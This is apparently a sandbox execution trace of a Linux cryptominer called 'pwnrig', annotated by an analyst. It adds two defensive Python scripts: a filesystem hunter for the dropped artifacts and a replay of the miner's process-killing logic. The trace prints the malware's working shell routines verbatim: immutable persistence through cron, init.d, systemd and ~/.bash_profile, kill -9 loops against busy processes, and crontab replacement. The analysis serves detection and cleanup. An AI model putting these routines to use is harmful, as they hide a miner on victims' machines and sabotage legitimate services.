    [3] /bin/sh  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"  PID:1731
      [4] /usr/bin/awk  awk "/[zZ]/ && !a[\$2]++ {print \$2}"  PID:1733
      [4] /usr/bin/ps  ps -A "-ostat,ppid"  PID:1732
          - Reads runtime system information
      [4] /usr/bin/id  id -u  PID:1735
      [4] /usr/bin/grep  grep -v grep  PID:1738
      [4] /usr/bin/grep  grep /etc/cron  PID:1737
      [4] /usr/bin/ps  ps x  PID:1736
          - Reads CPU attributes
          - Reads runtime system information
    [3] /bin/sh  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"  PID:1740
        - File and Directory Permissions Modification
        - Writes file to tmp directory
      [4] /usr/bin/id  id -u  PID:1741
      [4] /usr/bin/id  id -u  PID:1742
      [4] /usr/bin/chattr  chattr -i -a /bin/bprofr "~/.bash_profile"  PID:1743
      [4] /usr/bin/rm  rm -rf /bin/bprofr  PID:1744
      [4] /usr/bin/sed  sed -i /bprofr/d "~/.bash_profile"  PID:1745
      [4] /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/bprofr  PID:1746
          - Writes file to system bin folder
      [4] /usr/bin/id  id -u  PID:1747
      [4] /usr/bin/chattr  chattr +i +a /bin/bprofr "~/.bash_profile"  PID:1748
      [4] /usr/bin/mkdir  mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly  PID:1749
      [4] /usr/bin/chattr  chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr  PID:1750
      [4] /usr/bin/rm  rm -rf /bin/crondr  PID:1751
      [4] /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/crondr  PID:1752
          - Writes file to system bin folder
      [4] /usr/bin/tee  tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig  PID:1754
          - Creates/modifies Cron job
      [4] /usr/bin/sed  sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig  PID:1755
          - Creates/modifies Cron job
      [4] /usr/bin/chmod  chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr  PID:1756
          - File and Directory Permissions Modification
      [4] /usr/bin/chattr  chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr  PID:1757
          - Attempts to change immutable files
      [4] /usr/bin/which  which chkconfig  PID:1758
      [4] /usr/bin/which  which update-rc.d  PID:1759
      [4] /usr/bin/chattr  chattr -i -a /etc/init.d/pwnrig /bin/initdr  PID:1760
          - Attempts to change immutable files
      [4] /usr/sbin/update-rc.d  update-rc.d -f pwnrig disable  PID:1761
          - Flushes firewall rules
      [4] /usr/sbin/update-rc.d  update-rc.d -f pwnrig remove  PID:1762
        [5] /usr/local/sbin/systemctl  systemctl daemon-reload  PID:1763
        [5] /usr/local/bin/systemctl  systemctl daemon-reload  PID:1763
        [5] /usr/sbin/systemctl  systemctl daemon-reload  PID:1763
        [5] /usr/bin/systemctl  systemctl daemon-reload  PID:1763
      [4] /usr/bin/rm  rm -rf /bin/initdr  PID:1790
      [4] /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/initdr  PID:1791
          - Writes file to system bin folder
      [4] /usr/bin/tee  tee /etc/init.d/pwnrig  PID:1793
          - Modifies init.d
      [4] /usr/bin/sed  sed -i "1 s/-e //" /etc/init.d/pwnrig  PID:1794
          - Modifies init.d
      [4] /usr/bin/chmod  chmod +x /etc/init.d/pwnrig /bin/initdr  PID:1795
          - File and Directory Permissions Modification
      [4] /usr/sbin/update-rc.d  update-rc.d pwnrig defaults  PID:1796
        [5] /usr/local/sbin/systemctl  systemctl daemon-reload  PID:1797
        [5] /usr/local/bin/systemctl  systemctl daemon-reload  PID:1797
        [5] /usr/sbin/systemctl  systemctl daemon-reload  PID:1797
        [5] /usr/bin/systemctl  systemctl daemon-reload  PID:1797
      [4] /usr/sbin/update-rc.d  update-rc.d pwnrig enable  PID:1823
        [5] /usr/local/sbin/systemctl  systemctl --quiet enable pwnrig  PID:1824
        [5] /usr/local/bin/systemctl  systemctl --quiet enable pwnrig  PID:1824
        [5] /usr/sbin/systemctl  systemctl --quiet enable pwnrig  PID:1824
        [5] /usr/bin/systemctl  systemctl --quiet enable pwnrig  PID:1824
            - Reads EFI boot settings
        [5] /usr/local/sbin/systemctl  systemctl daemon-reload  PID:1825
        [5] /usr/local/bin/systemctl  systemctl daemon-reload  PID:1825
        [5] /usr/sbin/systemctl  systemctl daemon-reload  PID:1825
        [5] /usr/bin/systemctl  systemctl daemon-reload  PID:1825
            - Reads EFI boot settings
      [4] /usr/bin/chattr  chattr +i +a /etc/init.d/pwnrig /bin/initdr  PID:1851
      [4] /usr/bin/which  which systemctl  PID:1852
      [4] /usr/bin/chattr  chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr  PID:1853
      [4] /usr/bin/rm  rm -rf /bin/sysdr  PID:1854
      [4] /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/sysdr  PID:1855
          - Writes file to system bin folder
      [4] /usr/bin/tee  tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service  PID:1857
          - Modifies systemd
      [4] /usr/bin/sed  sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service  PID:1858
      [4] /usr/bin/chattr  chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr  PID:1859
      [4] /usr/bin/systemctl  systemctl enable pwnrige.service  PID:1860
      [4] /usr/bin/systemctl  systemctl enable pwnrigl.service  PID:1886
          - Reads EFI boot settings
      [4] /usr/bin/systemctl  systemctl daemon-reload  PID:1912
      [4] /usr/bin/systemctl  systemctl reload-or-restart pwnrige.service  PID:1938
          - Reads EFI boot settings
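Everything from the `sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin' ..."` child (PID 1740) down to `systemctl reload-or-restart pwnrige.service` is one persistence routine: copy /tmp/service-agent to /bin/bprofr, /bin/crondr, /bin/initdr and /bin/sysdr, write a launcher named pwnrig into every /etc/cron.* directory and into /etc/init.d, write pwnrigl.service and pwnrige.service, append a hook to ~/.bash_profile, and pin each artifact with `chattr +i +a`. Each launcher copies the binary to $PWNDIR/-bash and runs it from there. The script below is an added example, not code from the sample or the sandbox: a hunting pass over a filesystem root (`/` on a live host, or the mount point of an image) that looks for those exact paths and for the knlib/.klibsystem5 artifacts from earlier in the tree, content-scans the cron, init.d and systemd directories so a renamed launcher is still caught by the argument string it carries, and reports whether each hit is immutable. The sample tree it builds for demonstration is constructed.

```python
"""Hunt for the persistence installed by the `sh -c "if [ `id -u` ... ]"`
routine in the trace: /bin/{bprofr,crondr,initdr,sysdr} copies of
/tmp/service-agent, 'pwnrig' launchers in /etc/cron.* and /etc/init.d, the
pwnrigl/pwnrige systemd units, the ~/.bash_profile hook, and the earlier
knlib/.klibsystem5 artifacts. Added example, not code from the sample or
the sandbox. `root` is '/' on a live host or the mount point of an image;
the tree built by build_sample_tree() is constructed for demonstration.
"""
import os
import subprocess
import tempfile

CRON_DIRS = ["etc/cron.%s" % d for d in ("d", "daily", "hourly", "monthly", "weekly")]

# Paths created verbatim in the trace (root-installed variant; as non-root
# the copies land in /tmp/.pwn instead of /bin).
DROPPED = (["tmp/service-agent", "tmp/sys-helper", "tmp/.pwn",
            "bin/bprofr", "bin/crondr", "bin/initdr", "bin/sysdr",
            "bin/knlib5", "bin/klibsystem5", "var/tmp/.klibsystem5", "tmp/.klibsystem5",
            "etc/init.d/pwnrig", "etc/init.d/knlib",
            "lib/systemd/system/pwnrigl.service", "etc/systemd/system/pwnrige.service",
            "etc/systemd/system/knlibe.service", "var/spool/cron/.lib-knlib4"]
           + [d + "/pwnrig" for d in CRON_DIRS] + [d + "/.lib-knlib4" for d in CRON_DIRS])

# Every file in these directories is content-scanned, so a renamed launcher
# is caught by what it runs rather than by what it is called.
SCAN_DIRS = CRON_DIRS + ["etc/init.d", "etc/systemd/system", "lib/systemd/system",
                         "var/spool/cron", "var/spool/cron/crontabs"]

# Strings that appear verbatim in the launchers and cron lines of the trace.
MARKERS = ["-p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d",
           ".klibsystem", "(by pwned)"]


def is_immutable(path):
    """lsattr's 'i' flag (set in the trace with chattr +i +a); None when
    lsattr is missing or the filesystem does not support attributes."""
    try:
        out = subprocess.run(["lsattr", "-d", path], capture_output=True, text=True, check=False)
    except OSError:
        return None
    if out.returncode != 0 or not out.stdout.split():
        return None
    return "i" in out.stdout.split()[0]


def _read(path):
    try:
        with open(path, errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def scan(root, home="root"):
    """List of (kind, path, detail) findings under `root`."""
    findings, known = [], set()
    for rel in DROPPED:
        p = os.path.join(root, rel)
        known.add(p)
        if os.path.lexists(p):
            findings.append(("dropped path", p, "immutable=%s" % is_immutable(p)))
    for d in SCAN_DIRS:
        dp = os.path.join(root, d)
        if not os.path.isdir(dp):
            continue
        for name in sorted(os.listdir(dp)):
            p = os.path.join(dp, name)
            if os.path.isfile(p) and p not in known:
                hit = [m for m in MARKERS if m in _read(p)]
                if hit:
                    findings.append(("launcher content", p, hit[0]))
    bp = os.path.join(root, home, ".bash_profile")
    for line in _read(bp).splitlines():
        if "bprofr" in line or MARKERS[0] in line:   # what the script's own `sed -i /bprofr/d` targets
            findings.append(("bash_profile hook", bp, line.strip()))
            break
    return findings


def build_sample_tree(root):
    """Constructed tree: a pwnrig cron launcher, the same launcher under
    another name, a benign cron file, a /bin/sysdr copy, a hooked .bash_profile."""
    launcher = ("#!/bin/bash\ncp -f -r -- /bin/crondr /bin/-bash 2>/dev/null\ncd /bin 2>/dev/null\n"
                "./-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\n"
                "rm -rf -- -bash 2>/dev/null\n")
    files = {
        "etc/cron.d/pwnrig": launcher,
        "etc/cron.hourly/sysupdate": launcher,
        "etc/cron.d/e2scrub_all": "30 3 * * 0 root test -e /run/systemd/system || /sbin/e2scrub_all\n",
        "bin/sysdr": "ELF placeholder\n",
        "root/.bash_profile": "export PATH=$PATH:~/bin\ncp -f -r -- /bin/bprofr /bin/-bash 2>/dev/null && "
                              "/bin/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d "
                              ">/dev/null 2>&1 && rm -rf -- /bin/-bash 2>/dev/null\n",
    }
    for rel, content in files.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(content)
    return root


def demo():
    """Scan a freshly built sample tree and return its findings."""
    return scan(build_sample_tree(tempfile.mkdtemp(prefix="pwnrig-hunt-")))


if __name__ == "__main__":
    for kind, path, detail in demo():
        print("%-17s %s  %s" % (kind, path, detail))
```

On a live host run `scan("/")` as root; a finding with `immutable=True` must be cleared with `chattr -i -a` before the file can be removed, which is exactly why the routine sets the flags. Checking the launchers' content rather than only their names matters because the name pwnrig is a variable in the script and can change between builds while the argument string cannot without changing the miner's invocation.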
  [2] /tmp/service-agent  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d  PID:2001
      - Executes dropped EXE
      - Checks hardware identifiers (DMI)
      - Reads hardware information
      - Checks CPU configuration
      - Reads CPU attributes
      - Enumerates kernel/hardware configuration
      - Writes file to tmp directory
    [3] /bin/sh  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""  PID:2025
      [4] /usr/bin/hostname  hostname -I  PID:2028
      [4] /usr/bin/awk  awk "{print \$1}"  PID:2030
      [4] /usr/bin/awk  awk "{print \"-\"\$2}"  PID:2035
      [4] /usr/bin/head  head -n 1  PID:2034
      [4] /usr/bin/grep  grep "Port "  PID:2033
      [4] /usr/bin/cat  cat /etc/ssh/sshd_config  PID:2032
      [4] /usr/bin/whoami  whoami  PID:2036
      [4] /usr/bin/hostname  hostname  PID:2037
      [4] /usr/bin/grep  grep -c "^processor" /proc/cpuinfo  PID:2038
          - Checks CPU configuration
      [4] /usr/bin/sed  sed -e "s/\$//"  PID:2044
      [4] /usr/bin/sed  sed -e "s/^ *//"  PID:2043
      [4] /usr/bin/cut  cut -d: -f2  PID:2042
      [4] /usr/bin/grep  grep -m 1 "model name" /proc/cpuinfo  PID:2041
          - Checks CPU configuration
      [4] /usr/bin/awk  awk "{print \$1}"  PID:2047
          - Reads runtime system information
      [4] /usr/bin/awk  awk "{print \$4}"  PID:2050
      [4] /usr/bin/awk  awk "{print \$4}"  PID:2053
    [3] /bin/sh  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"  PID:2054
      [4] /usr/bin/awk  awk "/[zZ]/ && !a[\$2]++ {print \$2}"  PID:2056
      [4] /usr/bin/ps  ps -A "-ostat,ppid"  PID:2055
          - Reads CPU attributes
      [4] /usr/bin/id  id -u  PID:2058
      [4] /usr/bin/grep  grep -v grep  PID:2061
      [4] /usr/bin/grep  grep /etc/cron  PID:2060
      [4] /usr/bin/ps  ps x  PID:2059
    [3] /bin/sh  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"  PID:2063
        - Security Software Discovery
      [4] /usr/bin/id  id -u  PID:2064
      [4] /usr/bin/awk  awk "{if(\$3>30.0) print \$2}"  PID:2069
      [4] /usr/bin/grep  grep -v /usr/sbin/httpd  PID:2068
      [4] /usr/bin/grep  grep -v -- "-bash[[:space:]]*\$"  PID:2067
      [4] /usr/bin/grep  grep -v grep  PID:2066
      [4] /usr/bin/ps  ps aux  PID:2065
          - Reads CPU attributes
          - Process Discovery
          - Reads runtime system information
    [3] /bin/sh  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"  PID:2071
        - Security Software Discovery
      [4] /usr/bin/id  id -u  PID:2072
      [4] /usr/bin/wc  wc -l  PID:2078
      [4] /usr/bin/awk  awk "{if(\$3>30.0) print \$2}"  PID:2077
      [4] /usr/bin/grep  grep -- "-bash[[:space:]]*\$"  PID:2076
      [4] /usr/bin/grep  grep -v grep  PID:2075
      [4] /usr/bin/ps  ps aux  PID:2074
          - Process Discovery
          - Reads runtime system information
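The two `sh -c` children above tagged "Security Software Discovery" (PIDs 2063 and 2071) are the miner's competitor-killing logic. From `ps aux` (or `ps -u $(whoami) ux` when not root) the first one kills every process above 30 %CPU whose line does not end in `-bash`, is not /usr/sbin/httpd and is not a grep; the second one counts the `-bash` lines above 30 %CPU and, if there is more than one, kills them all, so that a single instance remains. Since every launcher in the tree copies the binary to $PWNDIR/-bash before running it, the `-bash` exemption is what spares the miner itself; the grep pattern `-bash[[:space:]]*$` requires the running miner to show a bare `-bash` command line, the same as a login shell. The code below is an added example, not code from the sample or the sandbox: it replays that selection over constructed `ps aux` lines to show the collateral damage on a real host (any busy daemon dies on the first pass), and flags `-bash` processes that a login shell could not be (no controlling terminal, or sustained CPU). The 5 %CPU floor and the sample process list are assumptions.

```python
"""Replay the competitor-killing selection the two `sh -c` children of
/tmp/service-agent perform on `ps aux`, and flag the '-bash' masquerade.
Added example, not code from the sample or the sandbox; SAMPLE_PS is a
constructed process list and the no-tty / 5 %CPU heuristic is an assumption.
"""
import re

BASH_TAIL = re.compile(r"-bash\s*$")     # grep -- '-bash[[:space:]]*$'
CPU_LIMIT = 30.0                         # awk '{if($3>30.0) print $2}'


def parse_ps_aux(text):
    """Rows of `ps aux` / `ps -u USER ux`: user, pid, %cpu, tty, command."""
    rows = []
    for line in text.splitlines()[1:]:             # drop the header line
        parts = line.split(None, 10)
        if len(parts) < 11:
            continue
        rows.append({"user": parts[0], "pid": int(parts[1]), "cpu": float(parts[2]),
                     "tty": parts[6], "cmd": parts[10]})
    return rows


def kill_targets(ps_text, is_root=True, user=None):
    """(first_pass, second_pass) PIDs the miner's loops would kill -9.

    first pass: everything above CPU_LIMIT that is not a '-bash' line, not
    /usr/sbin/httpd and not a grep; second pass: the '-bash' lines above
    CPU_LIMIT, but only when more than one exists (duplicate miners).
    As non-root the same logic runs over `ps -u $(whoami) ux`, i.e. only
    the caller's own processes."""
    rows = parse_ps_aux(ps_text)
    if not is_root:
        rows = [r for r in rows if r["user"] == user]
    hot = [r for r in rows if "grep" not in r["cmd"] and r["cpu"] > CPU_LIMIT]
    first = [r["pid"] for r in hot
             if not BASH_TAIL.search(r["cmd"]) and "/usr/sbin/httpd" not in r["cmd"]]
    bash_hot = [r["pid"] for r in hot if BASH_TAIL.search(r["cmd"])]
    second = bash_hot if len(bash_hot) > 1 else []
    return first, second


def masquerading_bash(ps_text, cpu_floor=5.0):
    """'-bash' processes that cannot be an interactive login shell: no
    controlling terminal, or sustained CPU. Heuristic with assumed thresholds."""
    return [r["pid"] for r in parse_ps_aux(ps_text)
            if BASH_TAIL.search(r["cmd"]) and (r["tty"] == "?" or r["cpu"] > cpu_floor)]


# Constructed `ps aux` snapshot: a busy Java service, Apache httpd, two
# miner instances masquerading as '-bash', one real login shell, a monitor.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 169000 11000 ?        Ss   10:00   0:01 /sbin/init
root       612 45.2  2.0 900000 80000 ?        Sl   10:01   9:11 /usr/bin/java -jar /opt/app/app.jar
www-data   700 35.0  1.0 300000 40000 ?        S    10:01   3:00 /usr/sbin/httpd -k start
root       801 98.7  0.5 250000 20000 ?        Ssl  10:05  22:10 -bash
root       802 97.9  0.5 250000 20000 ?        Ssl  10:05  21:58 -bash
admin      900  0.0  0.1  21000  5000 pts/0    Ss   10:02   0:00 -bash
root       950  0.3  0.2  40000  9000 ?        S    10:06   0:00 /usr/bin/python3 /opt/monitor/mon.py
root       960 40.0  0.1  10000  3000 ?        R    10:06   0:05 grep -r pattern /var/log
"""

if __name__ == "__main__":
    first, second = kill_targets(SAMPLE_PS)
    print("first pass kills:", first)            # the Java service
    print("second pass kills:", second)          # both miner copies
    print("masquerading -bash:", masquerading_bash(SAMPLE_PS))
```

Two things follow from the replay. The first pass is indiscriminate: on the sample it kills the Java service, and on a real host it will keep killing any legitimate process that crosses 30 %CPU every time the loop runs, which is itself a usable symptom (unexplained SIGKILLs of busy daemons). The second pass only fires when two or more `-bash` lines are hot, so a lone idle login shell is never touched; the masquerade check inverts that by asking which `-bash` has no terminal or is burning CPU.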
  [2] /tmp/sys-helper  /tmp/sys-helper  PID:2079
      - Executes dropped EXE
      - Writes file to tmp directory
  [2] /usr/bin/crontab  crontab -r  PID:2082
  [2] /usr/bin/pkill  pkill -f .klibsystem5  PID:2083
      - Reads CPU attributes
  [2] /usr/bin/pkill  pkill -f .klibsystem4  PID:2084
      - Reads runtime system information
  [2] /usr/bin/bash  bash -c "echo \"* * * * * /tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"  PID:2085
